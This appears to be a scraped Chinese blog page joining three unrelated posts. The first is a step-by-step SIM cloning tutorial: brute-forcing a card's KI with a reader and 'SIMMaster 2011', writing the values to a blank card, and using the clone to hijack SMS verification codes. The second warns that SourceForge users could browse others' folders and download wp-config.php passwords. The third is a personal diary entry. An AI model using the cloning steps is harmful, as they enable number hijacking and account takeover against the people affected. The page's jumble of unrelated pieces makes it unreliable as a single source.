图3上文中说过，理论上我们可以通过读卡器将相应的信息读取出来，然后写入到一张空白的SIM中即可完成克隆，但实际上并非如此，这点是厂商考虑到的，就好比银行卡一般是无法克隆的。其实在通讯过程中，我们只需要三个信息即可，IMSI、ICCID 和KI。IMSI 即&国际移动用户识别码&，用于标示用户；ICCID 即&集成电路卡识别码&，用于标示SIM 卡；KI 是用来加密的，它的用途后面我们说。IMSI 和ICCID 具体的格式我们不作介绍，有兴趣的读者可以查阅通信方面的书籍，我们只用了解是什么即可。其中最为重要的是、也是整个克隆过程中唯一要解决的就是KI，我们先看看整个通信鉴权过程。【GSM 鉴权】所谓鉴权，就是指鉴别用户的合法性，在两个人通话或者发送短信之前，是需要用SIM 卡中的信息向基站发出鉴别的，确保你的号码是合法的。这里说句题外话，普通手机通信是不与卫星打交道的，网上的一些吹牛的、一些不法骗子的所谓什么卫星定位（有GPS 就可以）、卫星监控之类的幌子都只当笑话看看就行了。手机通信直接交互的是基站，手机是如何找到基站的呢？基站其实不停在向外发送广播信息，手机就是接受到广播信息才知道基站的存在，中间其实还有一些较为复杂的过程，就不谈论了。在与另外一个用户建立通信的时候，需要鉴权，这里以移动来说明。首先移动那边保存了我们SIM 卡中的部分信息的，包括KI。在鉴权的时候，首先由基站发送一个随机数，即RAND()给手机，然后SIM 卡收到随机数以后，用自身的CPU 来做一些算饭，将A3 与RAND()加密后返回给基站，基站收到以后，也用同样的KI 做相同的运算，如果正确，则是合法用户。之后的通话和短信还分别用A3 与RAND()加密后的值再来用A5 和A8 算法加密。这里很明显可以得出：1)、通信内容是加密处理过的，也就是这不是以前大哥大的年代了，架一根天线就可以听到别人的通话内容了；2)、KI 是不在空中传播的，所以通过空中拦截电磁波找KI 是不行的；3)、加密是由基站产生的随机数，并且算法是作为国际保密的，教科书和专业书里是没有这类算法的，A3、A5、A8 只是一个算法代号，不具体指什么算法。我们知道SIM 卡里也有简单的处理器，理论上咱们可以动动电路逻辑来找算法，但实际是不行的。【解决KI 的问题】但是总有解决的办法，现在已经有很成熟的方法来破解SIM 中的KI 值了。是通过一定的算法来暴力破解的，所以破解时间有从几十分钟到几天甚至几个星期都可能的，这具体取决于您所使用的卡片的安全系数，咱总结了一下SIM 安全性的发展，如下：1)、2005 年上半年之前，那时的卡甚至可以几分钟内就读取出来的，安全性很差。2)、2005 后半年~2009 年之前，那时SIM 卡安全性依旧不是很高，用一定算法破解出KI 也用不了太久，我2008 年的卡也就两个小时破解出来了。3)、2009 年10 月至今，SIM 卡有相应的保护措施，并且有种自我保护的措施，只要破解到一定次数后，会自动毁卡。但是，现在也已经有针对这样卡的破解软件了，只不过不是百分之百成功而已。一张比指甲盖还大一点的卡片，经过这么多发展，想必是很多读者都不知道的。就好像从Windows 2000 到现在Windows7 及Windows 2008 中，底层的许多安全机制的改进是普通用户所不知道的。【克隆的具体实践】我这里只是针对移动的SIM 卡演示，以下内容不一定适合联通之类的，相关具体内容请网上搜索。克隆SIM 卡我们只需要如下几步：1)、识别你卡的年代，相信大部分读者在几年前就有手机号了，所以你可以自己回忆一下是什么时候办的卡，然后对照上方我总结的三个阶段。还可以取下你的SIM 卡，在卡上面有一窜数字，其中第11 位和12 位就是你卡片的年代了，我的十一位和十二位是&08&，所以是08 年的（动感地带卡）。2)、将SIM 卡片正确插入到SIM 读卡器中，连入电脑（本人的读卡器请参考图3，以及图2 左边的），并且安装SIM 读卡器的驱动。如果你是在淘宝上购买的SIM 卡，店家一般会送程序以及SIM 卡的驱动的。注意我没在Windows7 中成功安装驱动，而是在虚拟机中的Windows XP里成功安装了驱动程序。建议读者在Windows XP 中完成实验。3)、在&设备管理器&的COM 口中，找到SIM 读卡器的COM 口，一般是COM3。4)、运行破解工具，本人所使用的是&SIMMaster 2011&，然后在端口中选择&COM3&，速率一般是&19200&，低于这个速率只有慢速破解了。5)、如果连接成功，在&连接&按钮旁边有一个&防爆模式&，如果您的卡片是老卡片，可不必选择，这样破解速度会快得多。之后连接，程序界面会显示您卡片的ICCID、IMSI。然后点&开始扫描&即可。接下来就是漫长的等待，谁也不知道会破解多久，甚至不知道是否成功，更不知道您的卡片是否会被烧毁，请做好最坏的心理准备&&包括重新补卡。在破解过程中请不要强行断开读卡器或者强行结束破解程序的进程，如果要关机或者关闭程序，请先停止破解，然后再正常退出程序，再次打开并且连接此卡时，程序会自动接着上一次进度开始破解。如果成功，结果将是如图4 中的，图4 中是我成功破解了我的SIM 卡中的8 组KI 值。
图4从图中我们可以看到，我的卡片一共花费了61025 次的尝试才成功，扫速度是每小时44488 次（大约值），没有开启防爆模式。之后进行最后一步，写卡，从SIM 的大卡片上取出SIM 卡片，然后再次插入读卡器，运行卖家提供的对应的写卡软件，然后连接COM3，将ICCID、KI、IMSI 依次填入，之后写入到卡里，只要成功了，就可以正常使用这张卡了。如图5：
图5【利用克隆卡劫持短信和来电】虽然破解需要数小时，但我们依旧要注意自身卡片的安全，如果被不法份子手持你的卡片几个小时，那么他很可能会成功克隆你的SIM 卡。利用克隆过的SIM 卡，我们可以成功完成短信和来电的劫持。我们先来谈下两张SIM 同时使用，电话和短信应该流入在哪一张卡片的手机里。很多人说是最后开机的那部手机，其实是错的。在通信过程中，我们是和基站建立的单对单的通信（有点像TCP），也就是说，谁先和基站建立通信的，最后信息和电话就会流入先建立通信的那一部持卡手机里。而开机的时候手机往往需要向基站注册信息，所以才有了所谓的最后开机的那部收到信息和电话。我们来模拟这样一个场景：用户A 是持卡人，用户A1 是不法份子。在夜黑风高的时候，用户A正睡得熟呢，同寝室的用户A1 趁他熟睡的几个小时内偷偷取下他的SIM 卡，然后在用户A 不知不觉中克隆了他的SIM 卡。第二天用户A1 见用户A 正在等待一条有机密信息的短信，于是，用户A1 在用户A 收到短信之前，利用这张克隆过的卡片偷偷随意拨打了一个号码，比如10086，此时用户A1 和基站建立了单对单的通信，刚好机密信息来了，却被用户A1 给劫持了。等得焦急万分的用户A 打了个电话过去催对方，于是这时用户A 又和基站建立了单对单的通信，对方此时重发短信过来，用户A 成功收到了，于是他大声欢呼。【克隆卡的危害以及案例】我们知道，只要克隆了SIM 卡，如果是自己有了两部手机，为了方便切换而克隆，倒是非常方便，本人正是这样做的。但是如果被不法份子克隆以后，危害是很大的，因为这时拿到克隆卡的人完全可以像原本的合法用户那样去使用这张卡，比如手机找回密码、密码保护之类的措施，只要我们最后向基站建立连接，就可以收到一些验证码、重设密码等信息&&因为被劫持了。我们甚至还可以消费这张卡里的话费&&当然你每个月要是有公司报销话费，两个人用一张卡耗话费也不错。这里我简单说下两个案例：第一个例子,我们见过很多利用克隆技术来行骗的人，声称只要克隆了对方的手机卡，就可以监听对方的短信和电话了。刚才上面已经说了，能做的只是劫持，是不可以监听的！甚至有更搞笑的骗子，只要网上汇几百块钱，然后告诉他手机号码，过几天就寄一份克隆好的卡片给你。这招除非是移动内部人员所为，普通人是根本无法实现的，前面我们破解KI 都花了几个小时，更不说告诉对方一个号码就可以完成克隆。第二个例子，现在很多流入市场的所为&黑卡&，就是外面随便买的，不是经过移动营业厅正规办理的卡片，以稍微低的价格买的卡中，有一些正是克隆卡，现在有一种读卡器，不需要将SIM卡从大卡片上拆下，就可以读取并破解，然后再将卡片流入市场并出售，这些不法份子不定期用这些克隆的过的卡片，如果发现卡片已经被启用了，那么就经常发送一些垃圾广告短信，笔者正是受害人之一，针对这样的情况，我们只用去营业厅补办一张卡即可，因为新卡的IMSI 是不一样的，并且补卡的时候移动会更新你原本的IMSI，这样克隆卡就没法用了。【防范总结】讲这么多，我只是想用实例突出SIM 的安全性很重要，因为其重要程度不比其他账号的安全性差，很多人在没有实例面前总会认为别人是在空谈理论，给出实例后，可能会让人瞠目结舌。针对SIM 卡的安全，个人认为应该非常注意SIM 卡不要流入他人之手；另外便是，如果你的卡是很多年前办理的，应该以卡片遗失的借口去移动营业厅花一二十块钱重新补办一张新的卡片，并且养成一两年补办一次的习惯，这样才保证卡片所用的技术是最新的，并且万一不小心被人偷偷克隆过，这种方法也可以直接让他的克隆卡失效。&来源：
安全警告：SourceForge空间目录权限可能致账号密码泄露
是国外最大的开源软件存放平台，我们SourceForge搭建各种网站，也可以搭建博客、论坛。主要是因为它的优势是非常明显的，支持PHP,访问速度速度快，不限制注册，有功能强大的控制。甚至较早前，雨路博客也曾经在SourceForge空间上运行过好长的一段时间。雨路也做过SourceForge空间的相关教程。
& & 今天，我们要说的是SourceForge空间存在严重的安全隐患，这个隐患或许会导致类似于&CSDN-中文IT社区-600万帐号泄密&事件的重演&&大量站长的被盗取。在网上闲逛，发现免费资源发博爆料，有站长因为在SourceForge建站后，导致使用了同样邮箱和密码的的Godaddy账号和SourceForge账号同时被盗。于是雨路也赶紧查看了下，情况的确比较严重。
一、SourceForge空间可查看任意用户
1、用一个SF空间的账号和密码登录服务器。
2、默认的会进入SF空间的自己的项目下，可以看到的是自己项目的文件。
3、返回到SF空间的Root目录层。
4、点击Home，进入Users目录。就可以看到以字母开头的了，所有的用户都在这里。
5、如果是freehao123，那么应该点击F文件夹。
6、然后查找第二个字母，进入Fr文件夹。
7、最后，在几万个用户文件夹中，我们终于发现了freehao123这个文件夹了。这个文件夹确定是部落的无疑了
8、进入文件夹，点击用户，如下图：
9、然后就可以看到用户名下的文件了。
10、当然这里要稍微改一下路径才可以看到。
11、这里是部落的安装在SF空间的Wordpress，里面的wp-config.php文件被我直接下载下来，打开一看，里面有账号和密码。
二、SourceForge空间可查看任意文件的危害性1、SF空间的此&漏洞&由来已久。查了一下网上的资料，有网站就公布了&SourceForge某站点存在任意读取本地文件漏洞&。2、漏洞类型：任意文件遍历/下载。由于sourceForge使用nfs集中管理所有网站文件，可能导致产生大量的敏感信息泄露。3、当然后来SF空间修补了这个漏洞，但是SourceForge空间可查看任意文件一直没有改变，因为官方称SourceForge是一个开源免费平台。4、所有的放在SF空间上的程序和文件都是可以自由免费下载的。这一开源分享的&精神&可佳，可惜如果我们将一些敏感的信息的文件放在SF空间上就有可能遭受损失了。5、只要改变路径就能查看一切项目的任何文件，就算此项目不是自己创建的，这意味着将网站部署于SourceForge，任何其他用户都能对你的数据库进行操作。6、而且config文件里的密码如果是你常用密码的话... 某些&好奇之士& 难道不会去尝试去登录一下你的收费空间或者其它的平台吗？三、如何避免SourceForge泄露自己的密码与隐私1、有人会说加密配置文件，可惜别人都可以直接下载和删除文件，加密什么的都是无助的。2、建议最好不要使用SourceForge搭建博客和论坛之类的需要数据库的程序，就算是用于演示的测试站，也不要用与自己任何密码相同的密码。3、就算你用SourceForge存放静态内容，也不要放一些个人&某些&照片、&劲爆&视频、以防某一天自己一不小心就成了百度搜索风云榜的&头号人物&
&&& 来源：&&&
应该就是这样吧
& 有时候会想，一个男人应该是志在四方还是平平淡淡埋在胭脂坊。一个人因梦想而伟大，看到这句话，我发现我是那么的渺小。也不对，人本来不就是渺小的么，渺小到谷歌的卫星都完全看不见。& 有时候好讨厌文字，因为他没有丝毫力量，有时候又会喜欢看文字，因为只有文字才可以触动自己的感情。对啊，人为什么要这么多感伤，人生不是应该积极么，还是宪哥说的对，快乐跟悲伤应该1:1，那现在我是严重的失衡了么，失衡的人做的事就是充满怪癖。如果生在古代，我会是什么？整天无所事事的小混混？中规中矩的读书人？充满热情的爱国者？还是一个二世祖。其实还是二世祖好，轻松自在。为什么二世祖会被冠上了垃圾败类的头衔的，是因为我爸是李刚？还是因为之后的一系列事情？还是自己的家乡好，永远回到去都是那么的平静，那么的单调。& 有时候一个人的时候会乱想，可能就是因为自己不忙吧，还是忙一点好，忙起码证明自己还有用处，不忙的时候老在想，自己的价值就是这样生存着？会不会有一天自己被自己的想法逼死了，这样的人才是真的可悲吧。或许自己真的药习惯一下群体生活了，一个人还是没办法脱离社会吧。& 有时候会想，自己这个样，以后会怎样。准备毕业了，工作要做什么？以后的道路该怎么走，一直很抗拒父母给的道路，但是要自己选择道路就迷惘了。对啊，其实有人管管有什么不好的难道要没有人管你才好么，还是姐对，其实自己一直都是一个小孩子，想法理想化，老是以为自己都懂，其实自己真的懂了么？连我自己都不懂。& 有时候想跑去做一个小丑，起码能带给人开心快乐，看见别人笑，自己挺开心的。突然想起了自己初中时老师布置的作业，自己的愿望。想起来真傻，什么时候自己有这么伟大的，愿望是世界和平，世界和平跟我有什么关系，连自己都顾不了，还想顾世界。可笑啊，这个不是梦想了，是奢想了。有奢想这个词的么？好像没吧，没又怎样，没就自己造呗。& 其实人生就是这样的吧，到老了回想现在会怎样？笑话现在的自己煞笔还是怀念自己的天真。
站长在关注}